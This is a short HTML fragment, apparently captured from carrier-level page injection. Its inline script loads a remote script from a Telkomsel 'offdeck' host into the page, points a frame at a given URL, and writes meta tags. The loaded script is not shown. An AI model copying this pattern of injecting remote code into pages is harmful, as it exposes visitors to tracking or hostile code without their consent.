<script>
function go(w,u){xc=1;w.frames[0].location=u;}
var xc=-1,d=document,w=window,ip='10.10.151.180',vid='2808',md='0',u=location.href,hs=location.hostname,lac='0',ci='0';
gd = d.createElement("script");gd.src='https://offdeck.telkomsel.com:1443/pubjs/m.js';d.documentElement.firstChild.appendChild(gd);
var s='https://offdeck.telkomsel.com:1443/pubjs/index.php?r=publisher-api/js&id=acd19681ace096951877&g1g1';
var mp='<meta id="xvw" name="viewport" content="width=device-width,user-scalable=';
if (hs.indexOf("www.")==0)mp=mp+'yes">';else mp=mp+'no,initial-scale=1">';d.writeln(mp);
d.writeln('<meta charset="utf-8" />');
</script>
<body style="margin:0;height:100%;">
</body>
